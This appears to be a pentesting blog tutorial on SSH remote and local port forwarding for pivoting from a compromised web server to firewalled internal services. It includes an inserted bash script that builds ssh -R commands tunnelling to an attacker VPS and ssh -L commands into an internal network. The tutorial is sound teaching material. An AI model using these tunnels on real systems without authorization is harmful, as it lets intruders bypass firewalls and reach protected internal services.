Remote & Local Port Tunneling

Nairuz Abulhul
Published in R3d Buck3T
6 min read · Jan 11, 2021

SSH Port Forwarding, Network Pentesting, Pivoting

A year ago, I worked on one of the eLearnSecurity labs while taking the PTP course. During one of the labs, I compromised an external web server where I found internal MySQL and RDP services listening on localhost.

The firewall set up on that network blocked any inbound traffic to those services. To interact with them, I needed to tunnel the traffic from the compromised internal machine to mine and bypass the firewall restriction; that technique is called port forwarding or tunneling.

Today, we are going to talk about local and remote port tunneling with the SSH protocol.

📝$_Key_Concepts:

  • Port Tunneling Overview
  • Remote Port Forwarding
  • Local Port Forwarding
  • Resources

$_Port_Tunneling

Port tunneling or forwarding is a technique that carries the traffic of one TCP port inside another connection (here an SSH session), so that a service becomes reachable on a host and port where it is not normally exposed. We use it when we cannot reach the destination directly, either because a firewall filters it or because the service is bound only to an internal interface or to localhost.

$_Remote_Forwarding

Remote port forwarding (ssh -R) takes a service that is reachable from the SSH client and makes it available on a port opened on the SSH server. In our case the compromised host connects out to our machine and asks it to listen; whatever arrives on that listener is carried back through the tunnel to the internal service.

Scenario: let's say you have compromised a web server through a SQL injection vulnerability and obtained a reverse shell. During post-exploitation enumeration you find these services running on the server: VNC (5900), NodeJS (3000), MySQL (3306) and SSH (22). You also discover that the firewall does not allow inbound traffic to these ports, so you cannot connect to them directly.

However, this restriction does not apply to outbound traffic.

⛔️Issue

  • We (on the Pentester machine) cannot interact directly with the services running on the compromised web server.

🔥Firewall Rules

  • Inbound traffic is allowed only on ports 80 and 443
  • Outbound traffic is allowed on ports 80, 443 and 22

🎯Goal:

  • Interact with the locally hosted services for further enumeration.

❓ How would we interact with these internal services?

💡Solution

We can use remote port forwarding to expose the internal services and interact with them from our (attacker/pentester) machine.

Using SSH tunneling, we will have the SSH session open three listening ports on the Pentester machine (172.15.40.5), 2222, 5050 and 9003, and map them to the web server's local services NodeJS (3000), MySQL (3306) and VNC (5900).

The mapping is created by the SSH connection itself: the compromised machine logs in to our pentesting VPS over outbound port 22, which the firewall permits, and requests the forwards when the session is established.

From then on, anything we send to ports 2222, 5050 and 9003 on the Pentester machine is carried through the tunnel to the mapped service on the compromised machine, so we can reach those services even though they are filtered at the firewall.

127.0.0.1:3000 [NodeJS] => 172.15.40.5:2222
127.0.0.1:3306 [MySQL]  => 172.15.40.5:5050
127.0.0.1:5900 [VNC]    => 172.15.40.5:9003

Remote Port Forwarding

📌Remember:

  • With remote port forwarding, the Pentester/Attacker machine is the one listening: the forwarded ports are opened on it, and the compromised server connects out to create the tunnel.
  • The firewall allows outbound SSH traffic.
  • The compromised machine has an SSH client, and our Pentester machine runs an SSH server with an account the web server can log in to.

On the compromised machine, run these SSH commands:

$_Local_Forwarding

Local port forwarding (ssh -L) makes a REMOTE service available on a port of our local machine, in our case the Pentester machine. Let's take another scenario to understand this better.

Scenario:

We compromised a web server and got a reverse shell on it; during enumeration we discovered that, in addition to the current network (10.10.10.x), it has a second network interface connected to a different network (192.168.10.x).

On that internal network we identified three services, FTP, SMB and MySQL, running on different servers. We also found that we cannot connect to them directly: the firewall only allows the web server to interact with them.

⛔️Issue

  • We (the Pentester) cannot interact with the services running on the internal network (192.168.10.x): FTP, SMB and MySQL.

🔥Firewall Rules

  • Inbound and outbound traffic is allowed on ports 80, 443 and 22.

🎯Goal:

  • We want to interact with internal services on the internal network from our Pentester machine.

❓ How would we interact with these internal services?

💡Solution

We need to pivot through the compromised web server and forward traffic to and from the internal network with SSH tunneling. This time we use local port forwarding: we SSH from the Pentester machine into the web server and map ports on our own loopback to the internal services, so the web server makes the onward connections on our behalf.

127.0.0.1:5050 => 192.168.10.x:21   [FTP]
127.0.0.1:4455 => 192.168.10.x:445  [SMB]
127.0.0.1:9003 => 192.168.10.x:3306 [MySQL]

This way, every time we send FTP, SMB or MySQL traffic to 127.0.0.1:5050, :4455 or :9003 on our Pentester machine, it travels through the SSH session to the compromised web server, which opens the onward connection into the internal network. The internal hosts see a connection from the web server, the one host the firewall lets talk to them.

This is how we reach the internal services and enumerate them further.

Local Port Forwarding

📌Remember:

  • With local port forwarding, the Pentester machine (the SSH client) holds the listening ports. The compromised web server's SSH daemon receives the tunneled traffic and forwards it on to the FTP, MySQL and SMB servers on the internal network.
  • The firewall allows inbound SSH traffic (port 22) to the web server.
  • SSH is enabled on the compromised machine.
  • The Pentester has to obtain SSH credentials (or plant an authorized key) for the compromised server first, since the tunnel is an SSH login from the Pentester machine to the server.

On the Pentester machine, run these SSH commands:
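The command lines for both scenarios above, the remote-forwarding one typed on the compromised web server and the local-forwarding one typed on the Pentester machine, as an added example that is not the post's own commands. The account on the VPS (pentester@172.15.40.5), the web server's SSH user and address (www-data@10.10.10.10) and the three internal hosts in 192.168.10.x are assumptions; the post only gives the ports.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: builds the ssh -R / ssh -L command
# lines from the port mappings in the text and gives a listener check.
# Assumed names (not in the post): the VPS account, the web server's SSH user
# and the internal hosts in 192.168.10.x.
PENTESTER="pentester@172.15.40.5"   # our VPS; runs sshd, reachable on outbound tcp/22
WEBSERVER="www-data@10.10.10.10"    # compromised web server; we hold its SSH credentials
FTP_HOST="192.168.10.20"            # assumed internal hosts behind the web server
SMB_HOST="192.168.10.21"
MYSQL_HOST="192.168.10.22"

# forward_args MODE LISTEN_PORT:TARGET_HOST:TARGET_PORT ...
# Turns each mapping into one ssh flag. MODE R: the listener opens on the SSH
# *server* (remote forwarding). MODE L: the listener opens on the SSH *client*
# (local forwarding). In both modes the far end of the session opens the onward
# connection to TARGET_HOST:TARGET_PORT. Ports must be numeric and in 1..65535.
forward_args() {
    local mode=$1 spec lport rest thost tport p out=""
    shift
    case "$mode" in R|L) ;; *) echo "forward_args: mode must be R or L" >&2; return 1 ;; esac
    for spec in "$@"; do
        case "$spec" in *:*:*) ;; *) echo "forward_args: bad spec '$spec'" >&2; return 1 ;; esac
        lport=${spec%%:*}; rest=${spec#*:}; thost=${rest%%:*}; tport=${rest#*:}
        for p in "$lport" "$tport"; do
            case "$p" in ''|*[!0-9]*) echo "forward_args: bad port in '$spec'" >&2; return 1 ;; esac
            if [ "$p" -lt 1 ] || [ "$p" -gt 65535 ]; then
                echo "forward_args: port out of range in '$spec'" >&2; return 1
            fi
        done
        out="$out -$mode $lport:$thost:$tport"
    done
    printf '%s' "${out# }"
}

# Scenario 1, remote forwarding: typed ON THE COMPROMISED WEB SERVER. It logs in
# to our VPS (outbound tcp/22 is allowed) and asks our sshd to listen on
# 127.0.0.1:2222, :5050 and :9003; connections we make to those ports on the VPS
# are carried back through the session to NodeJS, MySQL and VNC on the server.
# -N: no remote shell, only the forwards. The listeners bind to the VPS loopback
# unless GatewayPorts is enabled in its sshd_config, which is what we want here.
remote_forward_cmd() {
    printf 'ssh -N %s %s' \
        "$(forward_args R 2222:127.0.0.1:3000 5050:127.0.0.1:3306 9003:127.0.0.1:5900)" \
        "$PENTESTER"
}

# Scenario 2, local forwarding: typed ON THE PENTESTER MACHINE. We log in to the
# web server and open 127.0.0.1:5050, :4455 and :9003 on OUR machine; the web
# server's sshd opens the onward connections into 192.168.10.x, so the firewall
# only ever sees the web server talking to the internal hosts.
local_forward_cmd() {
    printf 'ssh -N %s %s' \
        "$(forward_args L 5050:$FTP_HOST:21 4455:$SMB_HOST:445 9003:$MYSQL_HOST:3306)" \
        "$WEBSERVER"
}

# Run on the machine that should hold the listener (the VPS for -R, our own box
# for -L) once the session is up; returns 0 if something is bound to the port.
# Linux tooling (ss, with a netstat fallback) is assumed.
listening_on() {
    local port=$1
    if command -v ss >/dev/null 2>&1; then
        ss -lnt 2>/dev/null | awk '{print $4}' | grep -q "[:.]${port}\$"
    else
        netstat -lnt 2>/dev/null | awk '{print $4}' | grep -q "[:.]${port}\$"
    fi
}

echo "# on the compromised web server (remote forwarding):"
remote_forward_cmd; echo
echo "# on the pentester machine (local forwarding):"
local_forward_cmd; echo
```

Add -f to either command to push the session into the background once the forwards are up, then confirm with `listening_on 5050` on the listening side before pointing a client at it. When talking to MySQL through a forward, use `mysql -h 127.0.0.1 -P 5050`, not `-h localhost`: the MySQL client treats localhost as "use the Unix socket" and would bypass the tunnel. In the remote-forwarding case the compromised host is logging in to your VPS, so give it a throwaway account and an authorized_keys entry carrying `restrict,port-forwarding` so that key can open forwards and nothing else.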

That is how we use SSH tunneling to forward traffic to unreachable networks or internally hosted services during pentesting engagements.

That’s all for today. Thanks for reading !!!

I spend 70% of the time reading security stuff and 30% trying to make it work !!! aka Pentester [+] Publication: R3d Buck3T